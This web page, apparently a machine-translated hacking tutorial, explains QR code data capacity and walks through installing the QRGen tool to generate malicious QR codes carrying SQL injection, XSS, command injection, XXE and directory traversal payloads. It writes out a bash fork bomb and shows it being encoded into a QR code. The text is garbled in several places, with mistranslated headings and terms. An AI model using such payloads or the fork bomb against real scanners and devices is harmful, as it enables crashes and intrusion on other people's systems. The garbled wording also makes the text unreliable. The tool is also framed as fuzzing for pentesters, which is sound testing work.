How do you crack an android using the QR code?

How do you crack an android using the QR code?

QR codes are data formats that are useful for everything that needs to be scanned automatically.

Before QR codes there were several other formats, called linear bar codes, which also saved data in a machine-friendly form. You have probably seen the UPC barcode more than once as it is often used to identify products for sale so that cashiers can scan them.



UPC barcode, (or universal product code), used since 1974.
Its purpose is mainly retail and it only encodes a series of numbers, which makes it limited in use. Although there are many different types of linear bar codes, they cannot store much information. Applications such as shipping and car manufacturing required a standard that would contain more data.

What Codes-Can-Can-Charge Data?
QR codes have appeared in the automobile industry as a way to track cars in the process of their production, but their popularity has quickly grown outside this industry.

Like other codes, QR codes can contain a ton of data and even work with reduced resolution or other damage.

A single QR code can contain 4,296 ASCII characters, which gives much more possibilities. You can even format the data to trigger actions when the reader recognizes them.

One great application of QR codes because of their larger data capacity is to use them to manage Wi-Fi connections without using a password. Encoding the next line, you can create a QR code that automatically logs Android users into the Wi-Fi network.

WIFI:S:<SSID>;T:<WPA|WEP|> P:<password> H:<true|false|>

Anyone who scans a QR code on an Android device will automatically log into an encrypted Wi-Fi network. To see how much data the QR Code can pack, take a look at the code:

This tiny code contains the following text:

Version 40 QR Code can contain up to 1852 chars.
A QR code (abbreviated from Quick Response code) is a type of matrix barcode (or two-dimensional code) that is designed to be read by smartphones.
The code consists of black modules arranged in a square pattern on a white background. The information encoded may be text, a URL, or other data.
Created by Toyota subsidiary Denso Wave in 1994, the QR code is one of the most popular types of two-dimensional barcodes.
The QR code was designed to allow its contents to be decoded at high speed.
The technology has seen frequent use in Japan and South Korea; the United Kingdom is the seventh-largest national consumer of QR codes.
Although initially used for tracking parts in vehicle manufacturing, QR codes are now used in a much broader context,
including both commercial tracking applications and convenience-oriented applications aimed at mobile phone users (termed mobile tagging).
QR codes can be used to display text to the user, to add a vCard contact to the user's device, to open a Uniform Resource Identifier (URI), or to compose an e-mail or text message.
Users can generate and print their own QR codes for others to scan and use by visiting one of several paid and free QR codes generating sites or apps.

The text in the image is larger than the QR code itself! The capacity makes QR codes both powerful and dangerous because people cannot understand the data inside them without first scanning them.

QRgen for cracked codes

.
Since a person cannot recognize a malicious QR code before it is actually scanned, a relatively large QR code payload can benefit a hacker, especially in combination with vulnerable devices.

The tool that we will use today to create them is called QRGen.

.

He will take the payload and encode it in a QR code using Python.

QRGen comes with a built-in library that contains many popular exploits, which is very useful if you have the time to sit down at the same device you want to use and find out which one works. For a pentester who wants to test everything a QR code scanner uses, simply buying the same scanner and jogging through the exploits can cause the scanner to behave unexpectedly.

The payload categories available in QRGen can be accessed using -l and numbers at runtime. The number and type of payloads are listed below.

0: SQL injections

1: XSS

2: Command injection

3: string format

4: XXE

5: Jet Fuzzing

6: SSI injection

7: LFI / Directory Return

To create a bunch of malicious QR codes containing fuzzy line loads, I just need to run QRGen.py -l 5 to create a bunch of codes for testing.

What you need

.

To use QRGen, you need to install Python 3.

.
It should be possible in any operating system. You will also need several Python libraries including qrcode, Pillow and argparse, which we will also install.

Set QRGen

.
To start, download repository from Githaab.

~$ git clone https://github.com/h0nus/QRGen.

Cloning into 'QRGen'...
Enumerating objects: 86, done.
remote: Counting objects: 100% (86/86), done.
remote: Compressing objects: 100% (78/78), done.
remote: Total 86 (delta 26), reused 4 (delta 1), pack-reused 0
Unpacking objects: 100% (86/86), done.

When the upload is over, change the parameter (cd) to its directory and list (ls) its contents to find the file you need.

~$ cd QRGen
~/QRGen$ ls

demo.gif qrgen.py README.md requirements.txt words

Now you need to make sure that we have all the necessary libraries installed. To do this, run the installation file with the following command.

~/QRGen$ pip3 install -r requirements.txt

Collecting qrcode (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/42/87/4a3a77e59ab7493d64da1f69bf1c2e899a4cf81e51b2baa855e8cc8115be/qrcode-6.1-py2.py3-none-any.whl
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (5.4.1)
Collecting argparse (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/f2/94/3af39d34be01a24a6e65433d19e107099374224905f1e0cc6bbe1fd22a2f/argparse-1.4.0-py2.py3-none-any.whl
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from qrcode->-r requirements.txt (line 1)) (1.12.0)
Installing collected packages: qrcode, argparse
Successfully installed argparse-1.4.0 qrcode-6.1

If it doesn’t work, there’s an alternative team.

~/QRGen$ python3 -m pip install -r requirements.txt

Create malicious QR codes from payload type

Now you can run the script by typing python3 qrgen.py..

~/QRGen$ python3 qrgen.py

  e88 88e 888 88e e88'Y88
 d888 888b 888 888D d888 'Y, e, 888 8e
C8888 8888D 888 88" C8888 eeee d88 88b 888 88b
 Y888 888P 888 b, Y888 888P 888 , 888 888 888
  "88 88 88" 888 88b, "88 88 88" "YeeP" 888 888 888.
      b
      8b, QRGen ~ v0.1 ~ by h0nus

use: qrgen.py -l [number]
use: qrgen.py -w [/path/to/custom/wordlist]

Payload lists:
0 : SQL Injections
1 : XSS
2 : Command Injection
3 : Format String
4 : XXE
5 : String Fuzzing
6 : SSI Injection
7 : LFI / Directory Traversal

Tool to generate Malformed QRCodes for fuzzing QRCode parsers/reader

Optional arguments:
  -h, --help show this help message and exit

Options for QRGen:
  --list {0,1,2,3,4,5,6,7}, -l {0,1,2,3,4,5,6,7}
                        Set wordlist to use
  -w WORDLIST, -w WORDLIST.
                        Use a custom wordlist

Pay attention everywhere, even in the dumbest spot

Let’s start by creating a payload. To do this, run QRGen with the following argument.

~/QRGen$ python3 qrgen.py -l 5

  e88 88e 888 88e e88'Y88
 d888 888b 888 888D d888 'Y, e, 888 8e
C8888 8888D 888 88" C8888 eeee d88 88b 888 88b
 Y888 888P 888 b, Y888 888P 888 , 888 888 888
  "88 88 88" 888 88b, "88 88 88" "YeeP" 888 888 888.
      b
      8b, QRGen ~ v0.1 ~ by h0nus

Payload path generated...
Path already cleared or deleted...
Generated 46 payloads!
Opening last generated payloads...
Thanks for using QRGen, made by H0nus...

Several QR codes will be generated and the last one will be automatically opened.

To see the rest of the data, you can type cd genqr to go to the directory where it was created and view its contents.

~/QRGen$ cd genqr
~/QRGen/genqr$ ls

payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png
payload-18.png payload-27.png payload-36.png payload-45.png

Payload Coding

To encode the payload, we can first create a text file containing what we want to encode.

The line will be the new payload.

First we can create the next text file by typing nano badstuff.txt to create the text file.

~/QRGen/genqr$ nano badstuff.txt

We can put our payload into this text file. The one below is the fork bomb. Will it work on a QR code scanner? Well, who knows.

:(){ :|: & };:

We can save it by pressing Ctrl + X, then press Y and Enter to confirm the saving. You should now see a text file containing your payload.

~/QRGen/genqr$ ls

badstuff.txt payload-18.png payload-27.png payload-36.png payload-45.png
payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png

To write our payload into the QR code, we will use the command -w.

.
Assuming that your useful data file is called “badstuff.txt”, the command should look like this (remember to return to the QRGen directory in advance).

~/QRGen/genqr$ cd ...
~/QRGen$ python3 qrgen.py -w '/username/QRGen/genqr/badstuff.txt'.

  e88 88e 888 88e e88'Y88
 d888 888b 888 888D d888 'Y, e, 888 8e
C8888 8888D 888 88" C8888 eeee d88 88b 888 88b
 Y888 888P 888 b, Y888 888P 888 , 888 888 888
  "88 88 88" 888 88b, "88 88 88" "YeeP" 888 888 888.
      b
      8b, QRGen ~ v0.1 ~ by h0nus

Payload path exist, continuing...
Path already cleared or deleted...
Generated 1 payloads!
Opening last generated payloads...
Thanks for using QRGen, made by H0nus...

The program generates a QR code for my bomb.

Not all QR codes should be scanned

QR codes can encode a lot of information, and as we learned today, they can even be programmed to make the device do something.

This makes scanning a QR code risky because a person is not able to read the information before scanning. If you are scanning a QR code that seems suspicious, note that the code is trying to run, and do not connect to a Wi-Fi network or access a shortened link.


60 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: